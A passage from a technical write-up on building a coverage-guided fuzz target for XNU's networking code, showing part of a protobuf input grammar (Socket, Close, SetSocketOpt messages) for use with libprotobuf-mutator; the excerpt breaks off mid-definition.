At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN


message Close {

  required FileDescriptor fd = 1;


message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd =